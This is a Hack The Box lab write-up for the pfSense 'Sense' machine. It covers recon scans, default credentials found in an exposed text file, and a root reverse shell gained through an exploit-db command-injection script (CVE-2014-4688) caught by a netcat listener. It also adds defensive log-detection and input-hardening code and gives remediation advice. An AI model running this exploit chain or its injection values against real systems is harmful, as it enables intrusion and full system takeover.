Getting System on Sense - 'Sense' HTB Writeup
Host Information

| Hostname | IP Address | Operating System | Difficulty Level |
|---|---|---|---|
| Sense | 10.10.10.60 | FreeBSD | Easy |
Initial Recon
Again, we start with our initial recon of the target system. We’ll use the same enumeration automation script we used on ‘Sunday’, ‘Bounty’, and ‘Cronos’: nmapAutomator. You can find and download the script here on Github.
Let’s run a full scan against the target:
root@kali:~# nmapautomator 10.10.10.60 all
Running a all scan on 10.10.10.60
Host is likely running Linux
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 22:27 CST
Nmap scan report for 10.10.10.60
Host is up (0.045s latency).
Not shown: 998 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 7.38 seconds
---------------------Starting Nmap Basic Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 22:27 CST
Nmap scan report for 10.10.10.60
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/https?
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.07 seconds
----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 22:29 CST
Nmap scan report for 10.10.10.60
Host is up.
All 1000 scanned ports on 10.10.10.60 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.52 seconds
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 22:32 CST
Initiating Parallel DNS resolution of 1 host. at 22:32
Completed Parallel DNS resolution of 1 host. at 22:32, 0.01s elapsed
Initiating SYN Stealth Scan at 22:32
Scanning 10.10.10.60 [65535 ports]
Discovered open port 80/tcp on 10.10.10.60
Discovered open port 443/tcp on 10.10.10.60
SYN Stealth Scan Timing: About 9.81% done; ETC: 22:38 (0:04:45 remaining)
SYN Stealth Scan Timing: About 22.97% done; ETC: 22:37 (0:03:25 remaining)
SYN Stealth Scan Timing: About 34.39% done; ETC: 22:37 (0:02:54 remaining)
SYN Stealth Scan Timing: About 45.82% done; ETC: 22:37 (0:02:23 remaining)
SYN Stealth Scan Timing: About 57.25% done; ETC: 22:37 (0:01:53 remaining)
SYN Stealth Scan Timing: About 68.67% done; ETC: 22:37 (0:01:23 remaining)
SYN Stealth Scan Timing: About 80.10% done; ETC: 22:37 (0:00:52 remaining)
Completed SYN Stealth Scan at 22:37, 262.68s elapsed (65535 total ports)
Nmap scan report for 10.10.10.60
Host is up (0.044s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.86 seconds
Raw packets sent: 131267 (5.776MB) | Rcvd: 201 (8.844KB)
No new ports
---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 22:37 CST
Nmap scan report for 10.10.10.60
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/https?
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.77 seconds
Running Vuln scan on basic ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 22:37 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.60
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-server-header: lighttpd/1.4.35
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_https-redirect: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.35:
|_ CVE-2018-19052 5.0 https://vulners.com/cve/CVE-2018-19052
443/tcp open ssl/https?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.cvedetails.com/cve/2014-0224
| http://www.openssl.org/news/secadv_20140605.txt
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| Modulus Type: Non-safe prime
| Modulus Source: RFC5114/1024-bit DSA group with 160-bit prime order subgroup
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://www.securityfocus.com/bid/70574
|_ https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown:
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.22 seconds
---------------------Recon Recommendations----------------------
Web Servers Recon:
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.60:80 -o recon/gobuster_10.10.10.60_80.txt
nikto -host 10.10.10.60:80 | tee recon/nikto_10.10.10.60_80.txt
sslscan 10.10.10.60 | tee recon/sslscan_10.10.10.60_443.txt
gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u https://10.10.10.60:443 -o recon/gobuster_10.10.10.60_443.txt
nikto -host https://10.10.10.60:443 -ssl | tee recon/nikto_10.10.10.60_443.txt
Which commands would you like to run?
All (Default), gobuster, nikto, sslscan, Skip <!>
Running Default in (1) s:
---------------------Running Recon Commands----------------------
Starting gobuster scan
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.60:80
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/01/28 22:41:12 Starting gobuster
===============================================================
/changelog.txt (Status: 200)
/edit.php (Status: 200)
/exec.php (Status: 200)
/favicon.ico (Status: 200)
/graph.php (Status: 200)
/help.php (Status: 200)
/index.php (Status: 200)
/index.html (Status: 200)
/installer (Status: 200)
/interfaces.php (Status: 200)
/license.php (Status: 200)
/pkg.php (Status: 200)
/stats.php (Status: 200)
/status.php (Status: 200)
/system.php (Status: 200)
/tree (Status: 200)
/wizard.php (Status: 200)
/xmlrpc.php (Status: 200)
/~sys~ (Status: 403)
=========================
Starting nikto scan
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.60
+ Target Hostname: 10.10.10.60
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
Ciphers: AES256-SHA
Issuer: /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
+ Start Time: 2020-01-28 22:54:49 (GMT-6)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.35
+ Cookie cookie_test created without the secure flag
+ Cookie cookie_test created without the httponly flag
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Hostname '10.10.10.60' does not match certificate's names: Common
+ Multiple index files found: /index.php, /index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ 7864 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2020-01-28 23:19:00 (GMT-6) (1451 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan
=========================
---------------------Finished all Nmap scans---------------------
Completed in 51 minute(s) and 29 second(s)
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-29 12:07 CST
Nmap scan report for 10.10.10.60
Host is up (0.031s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (86%), FreeBSD 8.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.0 cpe:/o:freebsd:freebsd:8.1
Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.0 (86%), FreeBSD 8.1 (85%), OpenBSD 4.3 (85%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.18 seconds
OK, it looks like there are some potential SSL/TLS weaknesses such as POODLE that we might be able to leverage, but first let’s check out what’s being served on HTTP and HTTPS:
Checking out HTTP and HTTPS
Simply browsing to the IP of the box, we notice that it redirects to the HTTPS version of the site. We get a self-signed certificate warning, but if we continue past it, we’re greeted with a pfSense login page. Since pfSense is built on FreeBSD, this confirms the operating system. It also tells me that we need to be careful about what kind of automated enumeration and brute-force scripts we run against the system: pfSense is an open-source firewall distribution, so it’s possible that blocklist rules are already in place to protect the host if too many repeat attempts are detected in rapid succession. Just something to keep in mind. This might also explain why the nmapAutomator script took abnormally long when it got to the nikto portion of the scan. I’m not sure of a way to tell for certain from this vantage point, but I figure it’s better to be safe than sorry when it comes to noisy or brute-force scripts against a box like this.
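The nikto run above also reported the cookie_test cookie being set without the Secure and HttpOnly flags and the Strict-Transport-Security and X-Content-Type-Options headers being absent. Those are easy to re-check without nikto, so here is an added example (my code, not part of this writeup or of pfSense) that audits a raw HTTP response head for exactly those findings. The two responses are constructed to mimic a weak and a hardened reply from lighttpd/1.4.35; they were not captured from the box.

```python
"""Audit a raw HTTP/1.x response head for the cookie-flag and security-header
findings nikto reported above. Both sample responses are constructed."""

def parse_response(raw):
    """Split a raw response into (status_line, [(name, value), ...]).
    Header names are lower-cased; repeated headers such as several
    Set-Cookie lines are all kept."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def audit_response(raw, over_tls=True):
    """Return a list of finding strings, empty when nothing is wrong."""
    _, headers = parse_response(raw)
    findings = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0].strip()
        # Everything after the first ';' is an attribute; flags have no '='.
        attrs = {a.strip().lower() for a in value.split(";")[1:]}
        if over_tls and "secure" not in attrs:
            findings.append(f"cookie {cookie_name} created without the Secure flag")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie_name} created without the HttpOnly flag")
    names = {n for n, _ in headers}
    if over_tls and "strict-transport-security" not in names:
        findings.append("Strict-Transport-Security header not set")
    if "x-content-type-options" not in names:
        findings.append("X-Content-Type-Options header not set")
    return findings


# Constructed sample: what the nikto findings above describe.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: lighttpd/1.4.35\r\n"
    "Set-Cookie: cookie_test=1; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>login</body></html>"
)

# Constructed sample: the same response after the headers are fixed.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: lighttpd/1.4.35\r\n"
    "Set-Cookie: cookie_test=1; path=/; Secure; HttpOnly; SameSite=Strict\r\n"
    "Strict-Transport-Security: max-age=31536000\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(raw) or ["no findings"])
```

Feeding it the head of a real response (for example the output of `curl -ksi https://10.10.10.60/`) gives the same four findings nikto listed, and an empty list once the cookie flags and headers are in place.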
A quick Google search reveals that the default login credentials for pfSense are admin / pfsense; trying those does not work, however. Browsing to a few of the pages picked up by gobuster also just redirects to the login page.
We can see a file at the URI https://10.10.10.60/changelog.txt; checking it out shows that 2 of 3 vulnerabilities in the firewall have been patched:
# Security Changelog
### Issue
There was a failure in updating the firewall. Manual patching is therefore required
### Mitigated
2 of 3 vulnerabilities have been patched.
### Timeline
The remaining patches will be installed during the next maintenance window
It looks like the gobuster run in nmapAutomator doesn’t use many extensions, so let’s run it again with a few more extensions to see if we find any files the initial recon script may have overlooked. After trying a few wordlists, we find one that turns up some interesting results:
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,sh,html,pl,txt
[+] Timeout: 10s
===============================================================
2020/01/29 21:12:12 Starting gobuster
===============================================================
/index.php (Status: 200)
/index.html (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/system.php (Status: 200)
/status.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
/system-users.txt (Status: 200)
/filebrowser (Status: 301)
/%7echeckout%7e (Status: 403)
/services_dyndns.php (Status: 200)
===============================================================
2020/01/29 22:49:16 Finished
===============================================================
Interesting, so there are a few things we can check out, but the thing that sticks out to me is the /system-users.txt file. If we look at it, we see the following:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
Trying rohit / pfsense seems to work, and takes us to the pfSense dashboard.
Exploiting a pfsense vulnerability
From here, let’s do some further enumeration and see if we can find the third, unpatched vulnerability that changelog.txt mentions. We may be able to leverage an exploit for that vulnerability to gain an initial foothold on the box.
We can see upon first logging in that the box is running pfSense 2.1.3-RELEASE. If we do a quick searchsploit query for pfsense 2.1 (nothing showed up for 2.1.3), we see the following:
root@kali:~# searchsploit pfsense 2.1
------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------ ----------------------------------------
pfSense 2.1 build 20130911-1816 - Directo | exploits/php/webapps/31263.txt
pfSense < 2.1.4 - 'status_rrd_graph_img.p | exploits/php/webapps/43560.py
------------------------------------------ ----------------------------------------
Shellcodes: No Result
The second exploit looks like it might be applicable, but it may be one of the two already-patched vulnerabilities mentioned in changelog.txt. Let’s check it out. Viewing the exploit gives us a CVE number, CVE-2014-4688, and it looks to be a Python 3 exploit. It says:
pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
This script will return a reverse shell on specified listener address and port.
Awesome, sounds nice, let’s try it: using searchsploit -m 43560, we copy the exploit locally and look at the usage information.
root@kali:/writeups/HTB/sense/exploits# searchsploit -m 43560
Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
URL: https://www.exploit-db.com/exploits/43560
Path: /usr/share/exploitdb/exploits/php/webapps/43560.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /writeups/HTB/sense/exploits/43560.py
We can see the following usage information from the source code:
import argparse

# Command-line options the exploit expects (from the source of 43560.py)
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument("--username", help = "pfsense Username")
parser.add_argument("--password", help = "pfsense Password")
args = parser.parse_args()
So let’s start a listener locally with nc -lvnp 4444 and give it a shot:
root@kali:/writeups/HTB/sense/exploits# python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.50 --lport 4444 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed
root@kali:/writeups/HTB/sense
And if we look in our netcat session, we got a shell. Furthermore, it seems to be a single shot to root:
root@kali:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.60] 3313
sh: can't access tty; job control turned off
# id && date
uid=0(root) gid=0(wheel) groups=0(wheel)
Thu Jan 30 10:16:18 EST 2020
From here, we can go ahead and grab our flags:
# find / -name user.txt
/home/rohit/user.txt
# find / -name root.txt
/root/root.txt
So why did this work as a “one-shot” to root? By default, pfSense runs its web interface as root, so a command injected through that interface executes as root too. It’s almost certainly configurable not to run as root, but it would still need to make a lot of privileged system calls and command executions because of what a firewall has to do.
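Turning this section around to the defender’s side: the two things that made this box fall, the exposed recon files and the parameter injected into status_rrd_graph_img.php, both leave traces in the web server’s access log. The following is an added example of mine (not from this writeup, the exploit, or pfSense) that scans lighttpd-style access-log lines for reads of /system-users.txt and /changelog.txt and for requests to the vulnerable script whose query values contain anything beyond the plain file and time tokens rrdtool needs. The log lines are constructed, and the field order (remote host, vhost, user, timestamp, request, status) is assumed to be lighttpd’s default accesslog.format.

```python
"""Flag exposed-file reads and command-injection attempts against
status_rrd_graph_img.php in lighttpd-style access-log lines.
Every log line below is constructed for this example."""
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed lighttpd default layout: %h %V %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# rrdtool only ever needs file names and time tokens; anything else is suspect.
SAFE_VALUE = re.compile(r'^[A-Za-z0-9_.:-]*$')
VULNERABLE_SCRIPT = "/status_rrd_graph_img.php"
EXPOSED_FILES = {"/system-users.txt", "/changelog.txt"}


def analyze_line(line):
    """Return an (alert, source, detail) tuple or None for a benign line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    src = m.group("src")
    if parts.path in EXPOSED_FILES and m.group("status") == "200":
        return ("exposed-file-read", src, parts.path)
    if parts.path == VULNERABLE_SCRIPT:
        # parse_qsl percent-decodes, so %3B is compared as ';'.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if not SAFE_VALUE.match(value):
                return ("command-injection-attempt", src, f"{key}={value!r}")
    return None


def scan_log(lines):
    """Run analyze_line over an iterable of lines and collect the alerts."""
    return [a for a in (analyze_line(l) for l in lines) if a is not None]


# Constructed sample log, loosely following the timeline of this writeup.
SAMPLE_LOG = [
    '10.10.14.50 10.10.10.60 - [29/Jan/2020:21:12:12 -0600] "GET /changelog.txt HTTP/1.1" 200 180 "-" "gobuster/3.0.1"',
    '10.10.14.50 10.10.10.60 - [29/Jan/2020:22:40:01 -0600] "GET /system-users.txt HTTP/1.1" 200 96 "-" "Mozilla/5.0"',
    '10.10.14.50 10.10.10.60 - [30/Jan/2020:10:16:10 -0500] "GET /status_rrd_graph_img.php?database=queues&start=0&end=0 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.10.14.50 10.10.10.60 - [30/Jan/2020:10:16:18 -0500] "GET /status_rrd_graph_img.php?database=queues%3Bid HTTP/1.1" 200 0 "-" "python-requests/2.22"',
    '10.10.14.50 10.10.10.60 - [30/Jan/2020:10:16:20 -0500] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(*alert)
```

The third sample line is a legitimate graph request and is not flagged; the fourth is flagged because the decoded database value contains a semicolon. On a real deployment you would tail the access log and alert on either tuple type, and ship the rrd-graph alerts with the source address since the request had to be authenticated first.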
Conclusion
Recommended Remediations
- Sensitive information such as login credentials for the pfSense application should not be stored in a plaintext file on the web server. Furthermore, Rohit’s password should be changed away from the default pfsense password.
- The patch and vulnerability status of the server/application should not be stored in a publicly accessible location. This can give attackers/malicious actors a great advantage when compromising a system; this information should be kept internal.
- The pfSense application should be patched to mitigate CVE-2014-4688. This particular exploit made use of a weakness in input sanitization which allowed arbitrary command injection and execution through a PHP file that pfSense processed.
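To make the third remediation concrete, here is an added example of mine (generic Python rather than pfSense’s PHP, and not the project’s code) showing the weak pattern beside its hardened form for a handler that turns request parameters into an rrdtool command, which is the shape of the vulnerable endpoint. The parameter names mirror the graph endpoint, but the function names, RRD_DIR, and the allow-list of database names are assumptions for this example.

```python
"""Weak versus hardened construction of a system command from request
parameters (illustrating the input-sanitisation remediation above).
RRD_DIR, KNOWN_DATABASES and the function names are assumptions."""
import re
import subprocess
from pathlib import Path

RRD_DIR = Path("/var/db/rrd")                                   # assumed location
KNOWN_DATABASES = {"queues", "wan-traffic", "system-processor"}  # constructed allow-list
TIME_TOKEN = re.compile(r"^-?[0-9]{1,12}$")                      # integer timestamps only


class BadParameter(ValueError):
    """Raised when a request value is not something the command may receive."""


def build_command_vulnerable(database, start, end):
    """The weak pattern: untrusted values pasted into one shell string.
    Returned for inspection only, never executed here. Any shell
    metacharacter in `database` becomes part of the command line."""
    return (f"rrdtool graph /tmp/out.png --start {start} --end {end} "
            f"DEF:a={RRD_DIR}/{database}.rrd:a:AVERAGE")


def build_command_hardened(database, start, end):
    """Validate each value against what the command actually needs, then
    return an argv list so that no shell ever parses it."""
    if database not in KNOWN_DATABASES:
        raise BadParameter(f"unknown database {database!r}")
    for name, value in (("start", start), ("end", end)):
        if not TIME_TOKEN.match(str(value)):
            raise BadParameter(f"{name} must be an integer timestamp")
    rrd_file = RRD_DIR / f"{database}.rrd"
    return ["rrdtool", "graph", "/tmp/out.png",
            "--start", str(start), "--end", str(end),
            f"DEF:a={rrd_file}:a:AVERAGE"]


def is_accepted(database, start, end):
    """True when the hardened builder accepts the parameters."""
    try:
        build_command_hardened(database, start, end)
        return True
    except BadParameter:
        return False


def run_hardened(database, start, end):
    """Execute the validated argv with shell=False (requires rrdtool installed)."""
    return subprocess.run(build_command_hardened(database, start, end),
                          shell=False, capture_output=True, check=False)


if __name__ == "__main__":
    print(build_command_vulnerable("queues; id", 0, 0))   # metacharacters survive
    print(build_command_hardened("queues", -86400, 0))    # clean argv list
    print(is_accepted("queues; id", 0, 0))                # False
```

The allow-list is the important part: the hardened builder never tries to strip or escape bad characters, it rejects any database name that is not one of the files the application itself created, and it passes the result as an argument vector, so even a value that slipped through could not be interpreted by a shell.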
Until next time.
~@initinfosec
Let me know what you think of this article on twitter @initinfosec or leave a comment below!